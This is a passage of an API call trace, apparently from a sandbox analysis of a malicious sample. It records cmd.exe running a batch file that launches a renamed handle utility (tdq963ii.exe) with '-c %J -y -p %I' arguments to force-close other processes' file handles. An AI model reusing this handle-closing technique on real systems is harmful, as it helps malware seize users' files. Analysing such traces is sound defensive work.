lpMode=0x1ef160) returned 1 [0173.242] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.242] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x41f4e8*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1ef18c, lpReserved=0x0 | out: lpBuffer=0x41f4e8*, lpNumberOfCharsWritten=0x1ef18c*=0xc) returned 1 [0173.243] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef198 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0173.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.243] GetFileType (hFile=0x7) returned 0x2 [0173.243] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.244] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef158 | out: lpMode=0x1ef158) returned 1 [0173.244] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.244] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x1ef184, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef184*=0x26) returned 1 [0173.246] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef1b4 | out: _Buffer=") ") returned 2 [0173.246] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.246] GetFileType (hFile=0x7) returned 0x2 [0173.247] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.247] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0173.247] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.247] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x2) returned 1 [0173.248] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef1d4 | out: _Buffer="\r\n") returned 2 [0173.248] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.248] GetFileType (hFile=0x7) returned 0x2 [0173.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.249] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef194 | out: lpMode=0x1ef194) returned 1 [0173.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.250] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef1c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1c0*=0x2) returned 1 [0173.272] GetProcessHeap () returned 0x410000 [0173.272] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2c) returned 0x4255e8 [0173.272] GetProcessHeap () returned 0x410000 [0173.272] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc) returned 0x410db8 [0173.272] GetProcessHeap () returned 0x410000 [0173.272] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc) returned 0x410dd0 [0173.272] GetProcessHeap () returned 0x410000 [0173.272] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x410de8 [0173.272] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0173.272] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0173.272] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0173.272] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0173.272] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0173.272] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0173.272] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0173.272] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x1ef0f0, _Radix=0 | out: _EndPtr=0x1ef0f0*=",6 delims=: \"") returned 3 [0173.272] wcstol (in: _String="6 delims=: \"", _EndPtr=0x1ef0f0, _Radix=0 | out: _EndPtr=0x1ef0f0*=" delims=: \"") returned 6 [0173.272] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0173.272] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0173.272] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0173.273] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0173.273] GetProcessHeap () returned 0x410000 [0173.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410de8 | out: hHeap=0x410000) returned 1 [0173.273] GetProcessHeap () returned 0x410000 [0173.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x410de8 [0173.273] GetProcessHeap () returned 0x410000 [0173.273] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x410db8, Size=0xe) returned 0x410e00 [0173.273] GetProcessHeap () returned 0x410000 [0173.273] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x410e00) returned 0xe [0173.273] GetProcessHeap () returned 0x410000 [0173.273] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x410dd0, Size=0x14) returned 0x4263c0 [0173.273] GetProcessHeap () returned 0x410000 [0173.273] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4263c0) returned 0x14 [0173.273] _wpopen (_Command="tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0173.292] feof (_File=0x77032960) returned 0 [0173.292] ferror (_File=0x77032960) returned 0 [0173.292] GetProcessHeap () returned 0x410000 [0173.292] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x108) returned 0x4263e0 [0173.292] fgets (in: _Buf=0x4263e8, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0186.328] feof (_File=0x77032960) returned 0 [0186.328] ferror (_File=0x77032960) returned 0 [0186.328] GetProcessHeap () returned 0x410000 [0186.328] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4263e0, Size=0x208) returned 0x4263e0 [0186.328] GetProcessHeap () returned 0x410000 [0186.328] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4263e0) returned 0x208 [0186.328] fgets (in: _Buf=0x42642e, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0186.328] feof (_File=0x77032960) returned 0 [0186.329] ferror (_File=0x77032960) returned 0 [0186.329] GetProcessHeap () returned 0x410000 [0186.329] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4263e0, Size=0x308) returned 0x4263e0 [0186.329] GetProcessHeap () returned 0x410000 [0186.329] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4263e0) returned 0x308 [0186.329] fgets (in: _Buf=0x426431, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0189.914] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0189.915] GetProcessHeap () returned 0x410000 [0189.915] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4263e0, Size=0x9e) returned 0x4263e0 [0189.915] GetProcessHeap () returned 0x410000 [0189.915] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4263e0) returned 0x9e [0189.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x426431, cbMultiByte=73, lpWideCharStr=0x4263e8, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0189.916] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1eede4 | out: _Buffer="\r\n") returned 2 [0189.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.916] GetFileType (hFile=0x7) returned 0x2 [0189.917] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0189.917] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeda4 | out: lpMode=0x1eeda4) returned 1 [0189.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.917] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1eedd0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1eedd0*=0x2) returned 1 [0189.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0189.921] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1eede0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0189.922] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x1eede0 | out: _Buffer=">") returned 1 [0189.922] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.922] GetFileType (hFile=0x7) returned 0x2 [0189.922] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0189.923] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeda8 | out: lpMode=0x1eeda8) returned 1 [0189.923] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.923] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x1eedd4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x1eedd4*=0x26) returned 1 [0189.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.924] GetFileType (hFile=0x7) returned 0x2 [0189.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0189.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef02c | out: lpMode=0x1ef02c) returned 1 [0189.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.925] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1ef058, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x1ef058*=0x1) returned 1 [0189.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.926] GetFileType (hFile=0x7) returned 0x2 [0189.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0189.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef010 | out: lpMode=0x1ef010) returned 1 [0189.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.927] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x434ab8*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1ef03c, lpReserved=0x0 | out: lpBuffer=0x434ab8*, lpNumberOfCharsWritten=0x1ef03c*=0xc) returned 1 [0189.927] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef048 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0189.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.927] GetFileType (hFile=0x7) returned 0x2 [0189.928] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0189.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef008 | out: lpMode=0x1ef008) returned 1 [0189.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.929] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1ef034, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef034*=0x2c) returned 1 [0189.931] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef064 | out: _Buffer=") ") returned 2 [0189.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.931] GetFileType (hFile=0x7) returned 0x2 [0189.931] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0189.931] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef024 | out: lpMode=0x1ef024) returned 1 [0189.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.931] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef050, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef050*=0x2) returned 1 [0189.932] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef084 | out: _Buffer="\r\n") returned 2 [0189.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.932] GetFileType (hFile=0x7) returned 0x2 [0189.932] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0189.932] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef044 | out: lpMode=0x1ef044) returned 1 [0189.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.933] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef070, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef070*=0x2) returned 1 [0189.934] GetConsoleTitleW (in: lpConsoleTitle=0x1eeb94, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.935] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x426730, lpFilePart=0x1ee6b4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ee6b4*="Desktop") returned 0x25 [0189.935] SetErrorMode (uMode=0x0) returned 0x1 [0189.935] GetProcessHeap () returned 0x410000 [0189.936] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x426728, Size=0x6e) returned 0x426728 [0189.936] GetProcessHeap () returned 0x410000 [0189.936] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x426728) returned 0x6e [0189.936] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.936] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.936] GetProcessHeap () returned 0x410000 [0189.936] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x120) returned 0x4267a0 [0189.936] GetProcessHeap () returned 0x410000 [0189.936] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x238) returned 0x4268c8 [0189.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0189.936] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x1ee450, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee450) returned 0x426a78 [0189.937] FindClose (in: hFindFile=0x426a78 | out: hFindFile=0x426a78) returned 1 [0189.937] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0189.937] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0189.937] GetConsoleTitleW (in: lpConsoleTitle=0x1ee928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.937] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ee7b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ee878 | out: lpAttributeList=0x1ee7b0, lpSize=0x1ee878) returned 1 [0189.937] UpdateProcThreadAttribute (in: lpAttributeList=0x1ee7b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ee870, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ee7b0, lpPreviousValue=0x0) returned 1 [0189.937] GetStartupInfoW (in: lpStartupInfo=0x1ee76c | out: lpStartupInfo=0x1ee76c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0189.937] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.937] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ee80c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ee858 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x1ee858*(hProcess=0x74, hThread=0x84, dwProcessId=0x64, dwThreadId=0x6a0)) returned 1 [0189.975] CloseHandle (hObject=0x84) returned 1 [0189.975] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.975] GetProcessHeap () returned 0x410000 [0189.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429648 | out: hHeap=0x410000) returned 1 [0189.975] GetEnvironmentStringsW () returned 0x428ac0* [0189.975] GetProcessHeap () returned 0x410000 [0189.975] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb7c) returned 0x429648 [0189.975] FreeEnvironmentStringsW (penv=0x428ac0) returned 1 [0189.975] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0195.965] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x1ee74c | out: lpExitCode=0x1ee74c*=0x1) returned 1 [0195.965] CloseHandle (hObject=0x74) returned 1 [0195.966] _vsnwprintf (in: _Buffer=0x1ee894, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ee758 | out: _Buffer="00000001") returned 8 [0195.966] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0195.966] GetProcessHeap () returned 0x410000 [0195.966] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429648 | out: hHeap=0x410000) returned 1 [0195.966] GetEnvironmentStringsW () returned 0x428ac0* [0195.966] GetProcessHeap () returned 0x410000 [0195.966] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb7c) returned 0x429648 [0195.966] FreeEnvironmentStringsW (penv=0x428ac0) returned 1 [0195.966] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.966] GetProcessHeap () returned 0x410000 [0195.966] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429648 | out: hHeap=0x410000) returned 1 [0195.966] GetEnvironmentStringsW () returned 0x428ac0* [0195.966] GetProcessHeap () returned 0x410000 [0195.966] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb7c) returned 0x429648 [0195.966] FreeEnvironmentStringsW (penv=0x428ac0) returned 1 [0195.967] GetProcessHeap () returned 0x410000 [0195.967] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410dd0 | out: hHeap=0x410000) returned 1 [0195.967] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ee7b0 | out: lpAttributeList=0x1ee7b0) [0195.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.967] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.968] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0195.968] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.968] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0195.969] SetConsoleInputExeNameW () returned 0x1 [0195.969] GetConsoleOutputCP () returned 0x1b5 [0195.969] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0195.969] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef17c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0195.970] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0195.970] _get_osfhandle (_FileHandle=3) returned 0x74 [0195.970] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0195.970] GetProcessHeap () returned 0x410000 [0195.970] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4269f8 | out: hHeap=0x410000) returned 1 [0195.970] GetProcessHeap () returned 0x410000 [0195.970] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4268c8 | out: hHeap=0x410000) returned 1 [0195.970] GetProcessHeap () returned 0x410000 [0195.970] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4267a0 | out: hHeap=0x410000) returned 1 [0195.970] GetProcessHeap () returned 0x410000 [0195.970] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426728 | out: hHeap=0x410000) returned 1 [0195.971] GetProcessHeap () returned 0x410000 [0195.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4266a0 | out: hHeap=0x410000) returned 1 [0195.971] GetProcessHeap () returned 0x410000 [0195.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426488 | out: hHeap=0x410000) returned 1 [0195.971] GetProcessHeap () returned 0x410000 [0195.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434af8 | out: hHeap=0x410000) returned 1 [0195.971] GetProcessHeap () returned 0x410000 [0195.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434ab0 | out: hHeap=0x410000) returned 1 [0195.971] GetProcessHeap () returned 0x410000 [0195.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410de8 | out: hHeap=0x410000) returned 1 [0195.971] GetProcessHeap () returned 0x410000 [0195.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4263c0 | out: hHeap=0x410000) returned 1 [0195.971] GetProcessHeap () returned 0x410000 [0195.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410e00 | out: hHeap=0x410000) returned 1 [0195.971] GetProcessHeap () returned 0x410000 [0195.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4255e8 | out: hHeap=0x410000) returned 1 [0195.972] GetProcessHeap () returned 0x410000 [0195.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426360 | out: hHeap=0x410000) returned 1 [0195.972] GetProcessHeap () returned 0x410000 [0195.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x41f4e0 | out: hHeap=0x410000) returned 1 [0195.972] GetProcessHeap () returned 0x410000 [0195.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426300 | out: hHeap=0x410000) returned 1 [0195.972] GetProcessHeap () returned 0x410000 [0195.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4262a0 | out: hHeap=0x410000) returned 1 [0195.972] GetProcessHeap () returned 0x410000 [0195.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426228 | out: hHeap=0x410000) returned 1 [0195.972] GetProcessHeap () returned 0x410000 [0195.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4261d0 | out: hHeap=0x410000) returned 1 [0195.972] GetProcessHeap () returned 0x410000 [0195.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4112a0 | out: hHeap=0x410000) returned 1 [0195.972] GetProcessHeap () returned 0x410000 [0195.973] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426180 | out: hHeap=0x410000) returned 1 [0195.973] GetProcessHeap () returned 0x410000 [0195.973] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x411240 | out: hHeap=0x410000) returned 1 [0195.973] _get_osfhandle (_FileHandle=3) returned 0x74 [0195.973] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0195.973] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef160, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x1ef160*=0x0, lpOverlapped=0x0) returned 1 [0195.973] GetLastError () returned 0x0 [0195.973] _get_osfhandle (_FileHandle=3) returned 0x74 [0195.973] GetFileType (hFile=0x74) returned 0x1 [0195.973] _get_osfhandle (_FileHandle=3) returned 0x74 [0195.974] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0195.974] GetProcessHeap () returned 0x410000 [0195.974] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x434ab0 [0195.974] GetProcessHeap () returned 0x410000 [0195.974] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434ab0 | out: hHeap=0x410000) returned 1 [0195.974] _get_osfhandle (_FileHandle=3) returned 0x74 [0195.974] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0195.975] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef144, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x1ef144*=0x0, lpOverlapped=0x0) returned 1 [0195.975] GetLastError () returned 0x0 [0195.975] _get_osfhandle (_FileHandle=3) returned 0x74 [0195.975] GetFileType (hFile=0x74) returned 0x1 [0195.975] _get_osfhandle (_FileHandle=3) returned 0x74 [0195.975] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0195.975] GetProcessHeap () returned 0x410000 [0195.975] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x434ab0 [0195.975] GetProcessHeap () returned 0x410000 [0195.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434ab0 | out: hHeap=0x410000) returned 1 [0195.975] longjmp () [0195.976] _tell (_FileHandle=3) returned 226 [0195.976] _close (_FileHandle=3) returned 0 [0195.976] CmdBatNotification () returned 0x1 [0195.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.976] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.976] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0195.977] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.977] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0195.977] SetConsoleInputExeNameW () returned 0x1 [0195.977] GetConsoleOutputCP () returned 0x1b5 [0195.978] GetCPInfo (in: CodePage=0x1b5, 